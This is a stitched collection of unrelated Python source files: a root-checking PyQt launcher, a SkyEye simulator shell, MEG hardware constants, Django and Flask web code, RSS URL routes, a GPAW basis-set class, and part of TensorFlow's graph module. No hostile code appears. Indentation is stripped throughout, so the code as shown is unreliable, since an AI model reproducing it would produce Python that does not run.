#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from sys import argv,exit
from os import getuid
from PyQt4.QtGui import QApplication,QIcon
from Core.Privilege import frm_privelege
from Core.Main import Initialize
from Core.check import check_dependencies
if __name__ == '__main__':
if not getuid() == 0:
app2 = QApplication(argv)
priv = frm_privelege()
priv.setWindowIcon(QIcon('rsc/icon.ico'))
priv.show()
exit(app2.exec_())
else:
check_dependencies()
root = QApplication(argv)
app = Initialize(None)
app.setWindowIcon(QIcon('rsc/icon.ico'))
app.center()
app.show()
exit(root.exec_())
|
import cmd, sys
import skyeye_lib_path
from skyeye_module import *
def help_info_open():
print "help info:"
print "==========================================================="
def help_info_close():
print "==========================================================="
class SkyEyeCli(cmd.Cmd):
################Start cli init #############################
# Set the skyeye prompt
prompt = "(skyeye) "
####### Check status to change prompt ########
def postcmd(self, stop, line):
if libcommon.SIM_is_running() == True:
self.prompt = "(running) "
else:
self.prompt = "(skyeye) "
return stop
def default(self, line):
self.stdout.write('*** Unknown command: %s\n'%line)
self.stdout.write("*** Get commands with 'help' cmd\n")
file = None
def do_help(self, arg):
if arg:
# XXX check arg syntax
try:
func = getattr(self, 'help_' + arg)
except AttributeError:
try:
doc=getattr(self, 'do_' + arg).__doc__
if doc:
self.stdout.write("%s\n"%str(doc))
return
except AttributeError:
pass
self.stdout.write("%s\n"%str(self.nohelp % (arg,)))
return
func()
else:
names = self.get_names()
cmds_doc = []
cmds_undoc = []
help = {}
for name in names:
if name[:5] == 'help_':
help[name[5:]]=1
names.sort()
# There can be duplicates if routines overridden
prevname = ''
for name in names:
if name[:3] == 'do_':
if name == prevname:
continue
prevname = name
cmd=name[3:]
cmd = cmd.replace("_", "-")
if cmd in help:
cmds_doc.append(cmd)
del help[cmd]
elif getattr(self, name).__doc__:
cmds_doc.append(cmd)
else:
cmds_undoc.append(cmd)
# self.stdout.write("%s\n"%str(self.doc_leader))
# self.print_topics(self.doc_header, cmds_doc, 15,80)
# self.print_topics(self.misc_header, help.keys(),15,80)
# self.print_topics(self.undoc_header, cmds_undoc, 15,80)
self.print_topics("\nSkyEye command list", cmds_undoc, 15,80)
def complete(self, text, state):
if state == 0:
import readline
origline = readline.get_line_buffer()
line = origline.lstrip()
stripped = len(origline) - len(line)
begidx = readline.get_begidx() - stripped
endidx = readline.get_endidx() - stripped
if begidx>0:
cmd, args, foo = self.parseline(line)
if cmd == '':
compfunc = self.completedefault
else:
try:
compfunc = getattr(self, 'complete_' + cmd)
except AttributeError:
compfunc = self.completedefault
else:
compfunc = self.completenames
self.completion_matches = compfunc(text, line, begidx, endidx)
try:
return self.completion_matches[state]
except IndexError:
return None
def completenames(self, text, *ignored):
dotext = 'do_'+text
string = [a[3:] for a in self.get_names() if a.startswith(dotext)]
for index in range(len(string)):
string[index] = string[index].replace("_", "-")
return string
def onecmd(self, line):
line = line.replace("-", "_")
cmd, arg, line = self.parseline(line)
if not line:
return self.emptyline()
if cmd is None:
return self.default(line)
self.lastcmd = line
if cmd == '':
return self.default(line)
else:
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
return self.default(line)
return func(arg)
################ End cli init #############################
################ BEGIN COMMANDS DEFS#############################
####list-module list-options, list-machines, list-bp ####
def do_list_modules(self, arg):
# print "In do_list_modules"
libcommon.com_list_modules(arg)
def do_list_options(self, arg):
# print "In do_list_options"
libcommon.com_list_options(arg)
def do_list_machines(self, arg):
# print "In do_list_machines"
libcommon.com_list_machines(arg)
def do_list_bp(self, arg):
# print "In do_list_bp"
libcommon.com_list_bp(arg)
def help_list_modules(self):
help_info_open()
print "list-modules : List all the loaded module."
help_info_close()
def help_list_options(self):
help_info_open()
print "list-options : List all the available options for SkyEye."
help_info_close()
def help_list_machines(self):
help_info_open()
print "list-machines : List all the supported machines for SkyEye."
help_info_close()
def help_list_bp(self):
help_info_open()
print "list-bp : List all the breakpoint."
help_info_close()
####list-module list-options, list-machines, list-bp ####
########## show-pref, show-map, show-step ###############
def do_show_pref(self, arg):
# print "In do_show_pref"
libcommon.com_show_pref(arg)
def do_show_map(self, arg):
# print "In do_show_map"
libcommon.com_show_map(arg)
def do_show_step(self, arg):
# print "In do_show_step"
libcommon.com_show_step(arg)
def help_show_pref(self):
help_info_open()
print "show-pref : Show the current preference for SkyEye."
help_info_close()
def help_show_map(self):
help_info_open()
print "show-map : Show the current memory map for the machine."
help_info_close()
def help_show_step(self):
help_info_open()
print "show-step : Show the steps of current processor."
help_info_close()
########## show-pref, show-map, show-step ###############
############# cov-state, cov-off, cov-on ################
def do_cov_state(self, arg):
# print "In do_cov_state"
libcodecov.cov_state_show(arg)
def do_cov_off(self, arg):
# print "In do_cov_off"
libcodecov.cov_state_off(arg)
def do_cov_on(self, arg):
# print "In do_cov_on"
libcodecov.cov_state_on(arg)
def help_cov_state(self):
help_info_open()
print "cov-state : show code coverage state."
help_info_close()
def help_cov_off(self):
help_info_open()
print "cov-off : turn off code coverage switch."
help_info_close()
def help_cov_on(self):
help_info_open()
print "cov-on : turn on code coverage switch."
help_info_close()
############# cov-state, cov-off, cov-on ################
################## load-conf ##########################
def do_load_conf(self, arg):
# print "In do_load_conf"
libcommon.com_load_conf(arg)
def help_load_conf(self):
help_info_open()
print "load-conf : load a config file and parse it for SkyEye."
help_info_close()
################## load-conf ##########################
################### delete-bp ##########################
def do_delete_bp(self, arg):
# print "In do_delete_bp"
libcommon.com_delete_bp(arg)
def help_delete_bp(self):
help_info_open()
print "delete-bp : Delete some breakpoint."
help_info_close()
################### delete-bp ##########################
#################### log-bus ##########################
def do_log_bus(self, arg):
# print "In do_log_bus"
libbus_log.com_log_bus(arg)
def help_log_bus(self):
help_info_open()
print "log-bus : record every bus access to log file."
help_info_close()
#################### log-bus ##########################
#################### remote-gdb ########################
def do_remote_gdb(self, arg):
# print "In do_remote_gdb"
libgdbserver.com_remote_gdb
def help_remote_gdb(self):
help_info_open()
print "remote-gdb : Open remote gdb debugger."
help_info_close()
#################### remote-gdb ########################
#################### other COMMANDS ####################
def do_ls(self, arg):
# print "outline ls"
libcommon.com_list(arg)
def do_quit(self, arg):
# print "outline quit"
libcommon.com_quit(arg)
do_q = do_quit
def do_run(self, arg):
# print "outline run"
libcommon.com_run(arg)
def do_stop(self, arg):
# print "outline stop"
libcommon.com_stop(arg)
def do_continue(self, arg):
# print "outline continue"
libcommon.com_cont(arg)
def do_stepi(self, arg):
# print "outline stepi"
libcommon.com_si(arg)
def do_start(self, arg):
# print "outline start"
libcommon.com_start(arg)
def do_info(self, arg):
# print "outline info"
libcommon.com_info(arg)
def do_x(self, arg):
# print "outline x"
libcommon.com_x(arg)
def do_pmon(self, arg):
# print "outline pmon"
libpmon.com_pmon(arg)
def do_create_uart_16550(self, arg):
# print "outline create_uart_16550"
libuart_16550.com_create_16550
def do_disassemble(self, arg):
# print "outline disassemble"
libdisasm.com_disassemble(arg)
def do_break(self, arg):
# print "outline do_break"
libcommon.com_break(arg)
def help_ls(self):
help_info_open()
print "ls : Synonym for `list'"
help_info_close()
def help_quit(self):
help_info_open()
print "quit : Quit SkyEye "
help_info_close()
def help_q(self):
help_info_open()
print "q : Quit SkyEye "
help_info_close()
def help_run(self):
help_info_open()
print "run : Start the simulator."
help_info_close()
def help_stop(self):
help_info_open()
print "stop : Stop the running of simulator."
help_info_close()
def help_continue(self):
help_info_open()
print "continue : Continue the running of interrupted simulator."
help_info_close()
def help_stepi(self):
help_info_open()
print "stepi : step into ."
help_info_close()
def help_start(self):
help_info_open()
print "start : start simulator."
help_info_close()
def help_info(self):
help_info_open()
print "info : show information for various objects. "
help_info_close()
def help_x(self):
help_info_open()
print "x : display memory value at the address. "
help_info_close()
def help_pmon(self):
help_info_open()
print "pmon : enable the performance monitor."
help_info_close()
def help_create_uart_16550(self):
help_info_open()
print "create_uart_16550 : Create a new uart of 16550 type."
help_info_close()
def help_disassemble(self):
help_info_open()
print "disassemble : Disassemble the given address."
help_info_close()
def help_break(self):
help_info_open()
print "break : disassemble : set breakpoint for an address."
help_info_close()
#################### other COMMANDS ####################
##### End with Class SkyEye #####
|
"""KIT constants"""
# Author: Teon Brooks <[email protected]>
#
# License: BSD (3-clause)
from ..constants import Bunch
KIT = Bunch()
# byte values
KIT.SHORT = 2
KIT.INT = 4
KIT.DOUBLE = 8
KIT.STRING = 128
# pointer locations
KIT.AMPLIFIER_INFO = 112
KIT.BASIC_INFO = 16
KIT.CHAN_SENS = 80
KIT.RAW_OFFSET = 144
KIT.AVE_OFFSET = 160
KIT.SAMPLE_INFO = 128
KIT.MRK_INFO = 192
KIT.CHAN_LOC_OFFSET = 64
# parameters
KIT.VOLTAGE_RANGE = 5.
KIT.CALIB_FACTOR = 1.0 # mne_manual p.272
KIT.RANGE = 1. # mne_manual p.272
KIT.UNIT_MUL = 0 # default is 0 mne_manual p.273
# gain: 0:x1, 1:x2, 2:x5, 3:x10, 4:x20, 5:x50, 6:x100, 7:x200
KIT.GAINS = [1, 2, 5, 10, 20, 50, 100, 200]
# BEF options: 0:THROUGH, 1:50Hz, 2:60Hz, 3:50Hz
KIT.BEFS = [0, 50, 60, 50]
# coreg constants
KIT.DIG_POINTS = 10000
# create system specific dicts
KIT_NY = Bunch(**KIT)
KIT_AD = Bunch(**KIT)
# NY-system channel information
KIT_NY.NCHAN = 192
KIT_NY.NMEGCHAN = 157
KIT_NY.NREFCHAN = 3
KIT_NY.NMISCCHAN = 32
KIT_NY.N_SENS = KIT_NY.NMEGCHAN + KIT_NY.NREFCHAN
# 12-bit A-to-D converter, one bit for signed integer. range +/- 2048
KIT_NY.DYNAMIC_RANGE = 2 ** 11
# amplifier information
KIT_NY.GAIN1_BIT = 11 # stored in Bit 11-12
KIT_NY.GAIN1_MASK = 2 ** 11 + 2 ** 12
KIT_NY.GAIN2_BIT = 0 # stored in Bit 0-2
KIT_NY.GAIN2_MASK = 2 ** 0 + 2 ** 1 + 2 ** 2 # (0x0007)
KIT_NY.GAIN3_BIT = None
KIT_NY.GAIN3_MASK = None
KIT_NY.HPF_BIT = 4 # stored in Bit 4-5
KIT_NY.HPF_MASK = 2 ** 4 + 2 ** 5
KIT_NY.LPF_BIT = 8 # stored in Bit 8-10
KIT_NY.LPF_MASK = 2 ** 8 + 2 ** 9 + 2 ** 10
KIT_NY.BEF_BIT = 14 # stored in Bit 14-15
KIT_NY.BEF_MASK = 2 ** 14 + 2 ** 15
# HPF options: 0:0, 1:1, 2:3
KIT_NY.HPFS = [0, 1, 3]
# LPF options: 0:10Hz, 1:20Hz, 2:50Hz, 3:100Hz, 4:200Hz, 5:500Hz,
# 6:1,000Hz, 7:2,000Hz
KIT_NY.LPFS = [10, 20, 50, 100, 200, 500, 1000, 2000]
# Maryland-system channel information
# Virtually the same as the NY-system except new ADC circa July 2014
# 16-bit A-to-D converter, one bit for signed integer. range +/- 32768
KIT_MD = Bunch(**KIT_NY)
KIT_MD.DYNAMIC_RANGE = 2 ** 15
# AD-system channel information
KIT_AD.NCHAN = 256
KIT_AD.NMEGCHAN = 208
KIT_AD.NREFCHAN = 16
KIT_AD.NMISCCHAN = 32
KIT_AD.N_SENS = KIT_AD.NMEGCHAN + KIT_AD.NREFCHAN
# 16-bit A-to-D converter, one bit for signed integer. range +/- 32768
KIT_AD.DYNAMIC_RANGE = 2 ** 15
# amplifier information
KIT_AD.GAIN1_BIT = 12 # stored in Bit 12-14
KIT_AD.GAIN1_MASK = 2 ** 12 + 2 ** 13 + 2 ** 14
KIT_AD.GAIN2_BIT = 28 # stored in Bit 28-30
KIT_AD.GAIN2_MASK = 2 ** 28 + 2 ** 29 + 2 ** 30
KIT_AD.GAIN3_BIT = 24 # stored in Bit 24-26
KIT_AD.GAIN3_MASK = 2 ** 24 + 2 ** 25 + 2 ** 26
KIT_AD.HPF_BIT = 8 # stored in Bit 8-10
KIT_AD.HPF_MASK = 2 ** 8 + 2 ** 9 + 2 ** 10
KIT_AD.LPF_BIT = 16 # stored in Bit 16-18
KIT_AD.LPF_MASK = 2 ** 16 + 2 ** 17 + 2 ** 18
KIT_AD.BEF_BIT = 0 # stored in Bit 0-1
KIT_AD.BEF_MASK = 2 ** 0 + 2 ** 1
# HPF options: 0:0Hz, 1:0.03Hz, 2:0.1Hz, 3:0.3Hz, 4:1Hz, 5:3Hz, 6:10Hz, 7:30Hz
KIT_AD.HPFS = [0, 0.03, 0.1, 0.3, 1, 3, 10, 30]
# LPF options: 0:10Hz, 1:20Hz, 2:50Hz, 3:100Hz, 4:200Hz, 5:500Hz,
# 6:1,000Hz, 7:10,000Hz
KIT_AD.LPFS = [10, 20, 50, 100, 200, 500, 1000, 10000]
# KIT recording system is encoded in the SQD file as integer:
KIT_CONSTANTS = {32: KIT_NY, # NYU-NY, July 7, 2008 -
33: KIT_NY, # NYU-NY, January 24, 2009 -
34: KIT_NY, # NYU-NY, January 22, 2010 -
# 440 NYU-AD, initial launch May 20, 2011 -
441: KIT_AD, # NYU-AD more channels July 11, 2012 -
442: KIT_AD, # NYU-AD move to NYUAD campus Nov 20, 2014 -
51: KIT_NY, # UMD
52: KIT_MD, # UMD update to 16 bit ADC, July 4, 2014 -
53: KIT_MD} # UMD December 4, 2014 -
SYSNAMES = {33: 'NYU 160ch System since Jan24 2009',
34: 'NYU 160ch System since Jan24 2009',
441: "New York University Abu Dhabi",
442: "New York University Abu Dhabi"}
|
from django.shortcuts import get_object_or_404
from rest_framework.decorators import api_view
from rest_framework.response import Response
from influxdb.client import InfluxDBClientError
from .models import Metric
@api_view(('GET', 'POST'))
def metric_details(request, pk, format=None):
"""
Get or write metric values
"""
metric = get_object_or_404(Metric, pk=pk)
# get
if request.method == 'GET':
try:
results = metric.select(q=request.query_params.get('q', metric.query))
except InfluxDBClientError as e:
return Response({'detail': e.content}, status=e.code)
return Response(list(results.get_points(metric.name)))
# post
else:
if not request.data:
return Response({'detail': 'expected values in POST data or JSON payload'},
status=400)
data = request.data.copy()
# try converting strings to floats when sending form-data
if request.content_type != 'application/json':
for key, value in data.items():
try:
data[key] = float(value) if '.' in value else int(value)
except ValueError:
pass
# write
metric.write(data)
return Response({'detail': 'ok'})
|
from flask import Flask
from flask.ext.pymongo import PyMongo
import os
import ConfigParser
import logging
import logging.config
from logging.handlers import RotatingFileHandler
from utils.utils import Utils
# Create MongoDB database object.
mongo = PyMongo()
# Create utils instance.
utils = Utils()
def create_app():
''' Create the Flask app.
'''
# Create the Flask app.
app = Flask(__name__)
# Load application configurations
load_config(app)
# Configure logging.
configure_logging(app)
# Register URL rules.
register_url_rules(app)
# Init app for use with this PyMongo
# http://flask-pymongo.readthedocs.org/en/latest/#flask_pymongo.PyMongo.init_app
mongo.init_app(app, config_prefix='MONGO')
return app
def load_config(app):
''' Reads the config file and loads configuration properties into the Flask app.
:param app: The Flask app object.
'''
# Get the path to the application directory, that's where the config file resides.
par_dir = os.path.join(__file__, os.pardir)
par_dir_abs_path = os.path.abspath(par_dir)
app_dir = os.path.dirname(par_dir_abs_path)
# Read config file
# FIXME: Use the "common pattern" described in "Configuring from Files": http://flask.pocoo.org/docs/config/
config = ConfigParser.RawConfigParser()
config_filepath = app_dir + '/config.cfg'
config.read(config_filepath)
# Set up config properties
app.config['SERVER_PORT'] = config.get('Application', 'SERVER_PORT')
app.config['BASE_PATH'] = config.get('Application', 'BASE_PATH')
# Set up MongoDB DB Name
app.config['MONGO_DBNAME'] = config.get('Mongo', 'DB_NAME')
# Logging path might be relative or starts from the root.
# If it's relative then be sure to prepend the path with the application's root directory path.
log_path = config.get('Logging', 'PATH')
if log_path.startswith('/'):
app.config['LOG_PATH'] = log_path
else:
app.config['LOG_PATH'] = app_dir + '/' + log_path
app.config['LOG_LEVEL'] = config.get('Logging', 'LEVEL').upper()
def configure_logging(app):
# Get the path of the log from the config
log_path = app.config['LOG_PATH']
# Get the level of logging from the config
log_level = app.config['LOG_LEVEL']
# If path directory doesn't exist, create it.
log_dir = os.path.dirname(log_path)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# Create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# Create Log_Handler
log_handler = RotatingFileHandler(log_path, maxBytes=250000, backupCount=5)
# add formatter to log handler
log_handler.setFormatter(formatter)
# Get the level of the Debug and set it to the logger
app.logger.setLevel(log_level)
# Add the handlers to the logger
app.logger.addHandler(log_handler)
# Test if the logging is working by typing this string to a file.
app.logger.info('Logging to: %s', log_path)
# Views for json responses
from views.index import Index
from views.surveyeedistribution import SurveyeeDistribution
from views.groupedanswers import GroupedAnswers
from views.corruptiontype import CorruptionType
def register_url_rules(app):
''' Register URLs
:param app: The Flask application instance.
'''
# Show instructional index page.
app.add_url_rule(
'/',
view_func=Index.as_view('index'))
app.add_url_rule(
'/surveyee/distribution/<string:group>',
view_func=SurveyeeDistribution.as_view('json_surveyeedistribution'))
app.add_url_rule(
'/question/<int:qid>/group/<string:group>',
view_func=GroupedAnswers.as_view('json_groupedanswers'))
app.add_url_rule(
'/question/<int:qid>/group/<string:group>/disaggregate/<string:disaggregate>',
view_func=GroupedAnswers.as_view('json_disaggregated_groupedanswers'))
app.add_url_rule(
'/corruption-type/<string:corruption_type>/group/<string:group>',
view_func=CorruptionType.as_view('json_corruptiontype'))
|
from django.conf.urls import url
from apps.rss_feeds import views
urlpatterns = [
url(r'^feed_autocomplete', views.feed_autocomplete, name='feed-autocomplete'),
url(r'^search_feed', views.search_feed, name='search-feed'),
url(r'^statistics/(?P<feed_id>\d+)', views.load_feed_statistics, name='feed-statistics'),
url(r'^statistics_embedded/(?P<feed_id>\d+)', views.load_feed_statistics_embedded, name='feed-statistics-embedded'),
url(r'^feed_settings/(?P<feed_id>\d+)', views.load_feed_settings, name='feed-settings'),
url(r'^feed/(?P<feed_id>\d+)/?', views.load_single_feed, name='feed-info'),
url(r'^icon/(?P<feed_id>\d+)/?', views.load_feed_favicon, name='feed-favicon'),
url(r'^exception_retry', views.exception_retry, name='exception-retry'),
url(r'^exception_change_feed_address', views.exception_change_feed_address, name='exception-change-feed-address'),
url(r'^exception_change_feed_link', views.exception_change_feed_link, name='exception-change-feed-link'),
url(r'^status', views.status, name='status'),
url(r'^load_single_feed', views.load_single_feed, name='feed-canonical'),
url(r'^original_text', views.original_text, name='original-text'),
url(r'^original_story', views.original_story, name='original-story'),
url(r'^story_changes', views.story_changes, name='story-changes'),
]
|
"""BSSE: Basis Set Superposition Error module.
Defines a Setup-like class which has no properties that change anything,
except for an atomic basis set."""
import numpy as np
from ase.data import atomic_numbers
from gpaw.setup import BaseSetup
from gpaw.setup_data import SetupData
from gpaw.basis_data import Basis
from gpaw.spline import Spline
# Some splines are mandatory, but should then be zero to avoid affecting things
zero_function = Spline(0, 0.5, [0.0, 0.0, 0.0])
# Some operations fail horribly if the splines are zero, due to weird
# divisions and assumptions that various quantities are nonzero
#
# We'll use a function which is almost zero for these things
nonzero_function = Spline(0, 0.5, [0.0, 1.0e-12, 0.0]) # XXX
class GhostSetup(BaseSetup):
def __init__(self, basis, data):
self.symbol = data.symbol
self.data = data
self.phit_j = basis.tosplines()
self.basis = basis
self.niAO = sum([2 * phit.get_angular_momentum_number() + 1
for phit in self.phit_j])
self.HubU = None
self.filename = None
self.fingerprint = None
self.type = 'ghost'
self.Z = 0
self.Nv = 0
self.Nc = 0
self.ni = 1
self.pt_j = [zero_function]
self.wg_lg = None
self.g_lg = None
self.Nct = 1e-12 # XXX XXX XXX XXX
self.nct = nonzero_function # XXXXXX
self.lmax = 0
self.xc_correction = None
self.ghat_l = [nonzero_function] * (self.lmax + 1) # XXXXXX
self.rcgauss = 1e12 # XXX XXX XXX XXX
self.vbar = zero_function
self.Delta0 = 0.0
self.Delta_pL = np.zeros((1, self.lmax + 1))
self.E = 0.0
self.Kc = 0.0
self.M = 0.0
self.M_p = np.zeros(1)
self.M_pp = np.zeros((1, 1))
self.K_p = np.zeros(1)
self.MB = 0.0
self.MB_p = np.zeros(1)
self.dO_ii = np.zeros((1, 1))
self.f_j = [0.0]
self.n_j = [0]
self.l_j = [0]
self.nj = 1
self.lq = None # XXXX
self.rcutfilter = None
self.rcore = None
self.N0_p = np.zeros(1)
self.nabla_iiv = None
self.phicorehole_g = None
self.rgd = None
self.rcut_j = [0.5]
self.tauct = None
self.Delta_Lii = None
self.B_ii = None
self.dC_ii = None
self.X_p = None
self.ExxC = None
self.dEH0 = 0.0
self.dEH_p = np.zeros(1)
self.extra_xc_data = {}
class GhostSetupData:
def __init__(self, symbol):
self.chemsymbol = symbol
self.symbol = symbol + '.ghost'
self.Z = atomic_numbers[symbol]
def build(self, xcfunc, lmax, basis):
if basis is None:
raise ValueError('Loading partial waves not supported right now')
setup = GhostSetup(basis, self)
return setup
def print_info(self, text, _setup):
text('Ghost setup for %s' % self.chemsymbol)
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and functions used to construct graphs."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import linecache
import os
import re
import sys
import threading
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import function_pb2
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.framework import op_def_pb2
from tensorflow.core.framework import versions_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow as c_api
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import tape
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import cpp_shape_inference_pb2
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import op_def_registry
from tensorflow.python.framework import registry
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import control_flow_util
from tensorflow.python.platform import app
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util import decorator_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util.deprecation import deprecated_args
from tensorflow.python.util.tf_export import tf_export
# Temporary global switches determining if we should enable the work-in-progress
# calls to the C API. These will be removed once all functionality is supported.
_USE_C_API = True
_USE_C_SHAPES = os.getenv("TF_C_API_GRAPH_CONSTRUCTION_SHAPES", "0") is not "0"
def tensor_id(tensor):
"""Returns a unique identifier for this Tensor."""
return tensor._id # pylint: disable=protected-access
class _NullContextmanager(object):
def __enter__(self):
pass
def __exit__(self, type_arg, value_arg, traceback_arg):
return False # False values do not suppress exceptions
def _override_helper(clazz_object, operator, func):
"""Overrides (string) operator on Tensors to call func.
Args:
clazz_object: the class to override for; either Tensor or SparseTensor.
operator: the string name of the operator to override.
func: the function that replaces the overridden operator.
Raises:
ValueError: If operator has already been overwritten,
or if operator is not allowed to be overwritten.
"""
existing = getattr(clazz_object, operator, None)
if existing is not None:
# Check to see if this is a default method-wrapper or slot wrapper which
# will be true for the comparison operators.
if not isinstance(existing, type(object.__lt__)):
raise ValueError("operator %s cannot be overwritten again on class %s." %
(operator, clazz_object))
if operator not in Tensor.OVERLOADABLE_OPERATORS:
raise ValueError("Overriding %s is disallowed" % operator)
setattr(clazz_object, operator, func)
def _as_graph_element(obj):
"""Convert `obj` to a graph element if possible, otherwise return `None`.
Args:
obj: Object to convert.
Returns:
The result of `obj._as_graph_element()` if that method is available;
otherwise `None`.
"""
conv_fn = getattr(obj, "_as_graph_element", None)
if conv_fn and callable(conv_fn):
return conv_fn()
return None
_TENSOR_LIKE_TYPES = tuple()
def is_dense_tensor_like(t):
"""EXPERIMENTAL: Returns true if `t` implements the tensor interface.
See `register_dense_tensor_like_type()` for the current definition of a
"tensor-like type".
Args:
t: An object.
Returns:
True iff `t` is an instance of one of the registered "tensor-like" types.
"""
return isinstance(t, _TENSOR_LIKE_TYPES)
def register_dense_tensor_like_type(tensor_type):
"""EXPERIMENTAL: Registers `tensor_type` as implementing the tensor interface.
A "tensor-like type" can represent a single dense tensor, and implements
the `name` and `dtype` properties.
Args:
tensor_type: A type implementing the tensor interface.
Raises:
TypeError: If `tensor_type` does not implement the tensor interface.
"""
try:
if not isinstance(tensor_type.name, property):
raise TypeError("Type %s does not define a `name` property" %
tensor_type.__name__)
except AttributeError:
raise TypeError("Type %s does not define a `name` property" %
tensor_type.__name__)
try:
if not isinstance(tensor_type.dtype, property):
raise TypeError("Type %s does not define a `dtype` property" %
tensor_type.__name__)
except AttributeError:
raise TypeError("Type %s does not define a `dtype` property" %
tensor_type.__name__)
# We expect this list to be small, so choose quadratic complexity
# for registration, so that we have a tuple that can be used for
# more efficient `isinstance` checks later.
global _TENSOR_LIKE_TYPES
_TENSOR_LIKE_TYPES = tuple(list(_TENSOR_LIKE_TYPES) + [tensor_type])
def uid():
"""A unique (within this program execution) integer."""
return c_api.TFE_Py_UID()
def numpy_text(tensor, is_repr=False):
"""Human readable representation of a tensor's numpy value."""
if tensor.dtype.is_numpy_compatible:
text = repr(tensor.numpy()) if is_repr else str(tensor.numpy())
else:
text = "<unprintable>"
if "\n" in text:
text = "\n" + text
return text
# NOTE(ebrevdo): Do not subclass this. If you do, I will break you on purpose.
class _TensorLike(object):
"""Internal cls for grouping Tensor, SparseTensor, ..., for is_instance."""
pass
@tf_export("Tensor")
class Tensor(_TensorLike):
"""Represents one of the outputs of an `Operation`.
A `Tensor` is a symbolic handle to one of the outputs of an
`Operation`. It does not hold the values of that operation's output,
but instead provides a means of computing those values in a
TensorFlow @{tf.Session}.
This class has two primary purposes:
1. A `Tensor` can be passed as an input to another `Operation`.
This builds a dataflow connection between operations, which
enables TensorFlow to execute an entire `Graph` that represents a
large, multi-step computation.
2. After the graph has been launched in a session, the value of the
`Tensor` can be computed by passing it to
@{tf.Session.run}.
`t.eval()` is a shortcut for calling
`tf.get_default_session().run(t)`.
In the following example, `c`, `d`, and `e` are symbolic `Tensor`
objects, whereas `result` is a numpy array that stores a concrete
value:
```python
# Build a dataflow graph.
c = tf.constant([[1.0, 2.0], [3.0, 4.0]])
d = tf.constant([[1.0, 1.0], [0.0, 1.0]])
e = tf.matmul(c, d)
# Construct a `Session` to execute the graph.
sess = tf.Session()
# Execute the graph and store the value that `e` represents in `result`.
result = sess.run(e)
```
"""
# List of Python operators that we allow to override.
OVERLOADABLE_OPERATORS = {
# Binary.
"__add__",
"__radd__",
"__sub__",
"__rsub__",
"__mul__",
"__rmul__",
"__div__",
"__rdiv__",
"__truediv__",
"__rtruediv__",
"__floordiv__",
"__rfloordiv__",
"__mod__",
"__rmod__",
"__lt__",
"__le__",
"__gt__",
"__ge__",
"__and__",
"__rand__",
"__or__",
"__ror__",
"__xor__",
"__rxor__",
"__getitem__",
"__pow__",
"__rpow__",
# Unary.
"__invert__",
"__neg__",
"__abs__",
"__matmul__",
"__rmatmul__"
}
def __init__(self, op, value_index, dtype):
"""Creates a new `Tensor`.
Args:
op: An `Operation`. `Operation` that computes this tensor.
value_index: An `int`. Index of the operation's endpoint that produces
this tensor.
dtype: A `DType`. Type of elements stored in this tensor.
Raises:
TypeError: If the op is not an `Operation`.
"""
if not isinstance(op, Operation):
raise TypeError("op needs to be an Operation: %s" % op)
self._op = op
self._value_index = value_index
self._dtype = dtypes.as_dtype(dtype)
# This will be set by self.shape().
self._shape_val = None
# List of operations that use this Tensor as input. We maintain this list
# to easily navigate a computation graph.
self._consumers = []
if not _USE_C_SHAPES:
# Attributes used for C++ shape inference. Not inspected, only forwarded.
# If set, will be a HandleData object from cpp_shape_inference.proto.
self._handle_data = None
self._id = uid()
@property
def op(self):
"""The `Operation` that produces this tensor as an output."""
return self._op
@property
def dtype(self):
"""The `DType` of elements in this tensor."""
return self._dtype
@property
def graph(self):
"""The `Graph` that contains this tensor."""
return self._op.graph
@property
def name(self):
"""The string name of this tensor."""
if not self._op.name:
raise ValueError("Operation was not named: %s" % self._op)
return "%s:%d" % (self._op.name, self._value_index)
@property
def device(self):
"""The name of the device on which this tensor will be produced, or None."""
return self._op.device
@property
def shape(self):
"""Returns the `TensorShape` that represents the shape of this tensor.
The shape is computed using shape inference functions that are
registered in the Op for each `Operation`. See
@{tf.TensorShape}
for more details of what a shape represents.
The inferred shape of a tensor is used to provide shape
information without having to launch the graph in a session. This
can be used for debugging, and providing early error messages. For
example:
```python
c = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
print(c.shape)
==> TensorShape([Dimension(2), Dimension(3)])
d = tf.constant([[1.0, 0.0], [0.0, 1.0], [1.0, 0.0], [0.0, 1.0]])
print(d.shape)
==> TensorShape([Dimension(4), Dimension(2)])
# Raises a ValueError, because `c` and `d` do not have compatible
# inner dimensions.
e = tf.matmul(c, d)
f = tf.matmul(c, d, transpose_a=True, transpose_b=True)
print(f.shape)
==> TensorShape([Dimension(3), Dimension(4)])
```
